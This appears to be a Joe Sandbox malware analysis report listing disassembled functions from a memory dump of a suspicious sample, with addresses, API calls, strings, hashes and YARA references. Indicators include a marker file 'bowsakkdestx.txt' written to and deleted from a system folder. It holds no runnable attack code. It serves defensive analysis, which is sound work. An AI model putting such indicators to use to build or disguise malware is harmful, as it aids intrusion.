                                                                                                                                                                                                                                        • Opcode ID: 79e553d7807a71c31d5f565a6ca679b64bdd2cc97f395ffbc82dd2b658a72be3
                                                                                                                                                                                                                                        • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79e553d7807a71c31d5f565a6ca679b64bdd2cc97f395ffbc82dd2b658a72be3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                                                                                                                        • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                                                        • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                                                                                                                                                        • API String ID: 2102423945-2013712220
                                                                                                                                                                                                                                        • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                                                                                                        • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 0040C5DA
                                                                                                                                                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 0040C5F6
                                                                                                                                                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 0040C640
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                                                                                        • Opcode ID: bdba235617e576317071dbdcb3c7f0f635bbb3b946519964353194869aba474c
                                                                                                                                                                                                                                        • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdba235617e576317071dbdcb3c7f0f635bbb3b946519964353194869aba474c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcscmp
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 856254489-711371036
                                                                                                                                                                                                                                        • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                                                                                                                                                        • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                                                                                        • Opcode ID: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                                                                                                                                                                                                                                        • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                                                                                                                                                        • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                                                                                                        • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                                                                                        • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                                                        • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove_strtok
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3446180046-0
                                                                                                                                                                                                                                        • Opcode ID: c00f777057cfc497f6ad005c04cc735c1c0148d3cbba073175e6a02dfb1863fe
                                                                                                                                                                                                                                        • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c00f777057cfc497f6ad005c04cc735c1c0148d3cbba073175e6a02dfb1863fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                                                                                        • Opcode ID: f1e55ddf1b48320da422e8d24451972b863506930d60daf63cc4f741a3860e6f
                                                                                                                                                                                                                                        • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1e55ddf1b48320da422e8d24451972b863506930d60daf63cc4f741a3860e6f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                                                                                        • Opcode ID: 17e48d2795cb0a26b32502bf9f9c6cd4e969bd77cc15fecae0c63f2ffe2a3f24
                                                                                                                                                                                                                                        • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17e48d2795cb0a26b32502bf9f9c6cd4e969bd77cc15fecae0c63f2ffe2a3f24
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                                                                                                                                                          • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                                                                                                                                                          • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                                                                                                                                                          • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                                                                                                                                                          • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00425A37
                                                                                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00425A57
                                                                                                                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                                                                                        • Opcode ID: da4dd83d0a7bbd407258e1c08e6412638ccc8f45690559412b66f785422cb9d5
                                                                                                                                                                                                                                        • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da4dd83d0a7bbd407258e1c08e6412638ccc8f45690559412b66f785422cb9d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 004127C3
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004127CE
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
